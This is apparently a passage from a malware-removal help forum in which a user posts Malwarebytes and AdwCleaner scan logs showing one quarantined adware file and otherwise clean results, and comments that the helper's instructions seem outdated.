¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Registry ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ WMI ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Hosts File ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Files ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ Web browsers ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Malwarebytes
www.malwarebytes.com
-Log Details-
Scan Date: 2/11/19
Scan Time: 7:30 AM
Log File: ccc3d460-2d8b-11e9-b3ab-0026b664e783.json
-Software Information-
Version: 3.7.1.2839
Components Version: 1.0.538
Update Package Version: 1.0.9200
License: Trial
-System Information-
OS: Windows 10 (Build 10240.16487)
CPU: x64
File System: NTFS
User: DESKTOP-OHFLJFD\Thomazing!
-Scan Summary-
Scan Type: Threat Scan
Scan Initiated By: Manual
Result: Completed
Objects Scanned: 244845
Threats Detected: 1
Threats Quarantined: 1
Time Elapsed: 3 min, 16 sec
-Scan Options-
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Disabled
Heuristics: Enabled
PUP: Detect
PUM: Detect
-Scan Details-
Process: 0
(No malicious items detected)
Module: 0
(No malicious items detected)
Registry Key: 0
(No malicious items detected)
Registry Value: 0
(No malicious items detected)
Registry Data: 0
(No malicious items detected)
Data Stream: 0
(No malicious items detected)
Folder: 0
(No malicious items detected)
File: 1
Adware.Csdimonetize, C:\USERS\THOMAZING!\APPDATA\LOCAL\TEMP\GLOBAL_INSTALLER.EXE, Quarantined, [2891], [637435],1.0.9200
Physical Sector: 0
(No malicious items detected)
WMI: 0
(No malicious items detected)
(end)
-
February 10th, 2019, 08:02 PM
#15
# -------------------------------
# Malwarebytes AdwCleaner 7.2.7.0
# -------------------------------
# Build: 01-30-2019
# Database: 2019-01-25.2 (Local)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 02-11-2019
# Duration: 00:00:00
# OS: Windows 10 Pro
# Cleaned: 0
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
No malicious folders cleaned.
***** [ Files ] *****
No malicious files cleaned.
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
No malicious registry entries cleaned.
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
*************************
[+] Delete Tracing Keys
[+] Reset Winsock
*************************
AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]
AdwCleaner[C00].txt - [2657 octets] - [09/02/2019 12:46:19]
AdwCleaner[S01].txt - [1371 octets] - [11/02/2019 07:45:20]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########
# -------------------------------
# Malwarebytes AdwCleaner 7.2.7.0
# -------------------------------
# Build: 01-30-2019
# Database: 2019-01-25.2 (Local)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Scan
# -------------------------------
# Start: 02-11-2019
# Duration: 00:00:16
# OS: Windows 10 Pro
# Scanned: 31769
# Detected: 0
***** [ Services ] *****
No malicious services found.
***** [ Folders ] *****
No malicious folders found.
***** [ Files ] *****
No malicious files found.
***** [ DLL ] *****
No malicious DLLs found.
***** [ WMI ] *****
No malicious WMI found.
***** [ Shortcuts ] *****
No malicious shortcuts found.
***** [ Tasks ] *****
No malicious tasks found.
***** [ Registry ] *****
No malicious registry entries found.
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries found.
***** [ Chromium URLs ] *****
No malicious Chromium URLs found.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries found.
***** [ Firefox URLs ] *****
No malicious Firefox URLs found.
AdwCleaner[S00].txt - [2783 octets] - [09/02/2019 12:30:40]
AdwCleaner[C00].txt - [2657 octets] - [09/02/2019 12:46:19]
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[S01].txt ##########
Fraud and trojans still pop up and are blocked by MWB.
Btw, it seems your instructions are old, like from 10 years ago. Maybe you should update them. It's different now.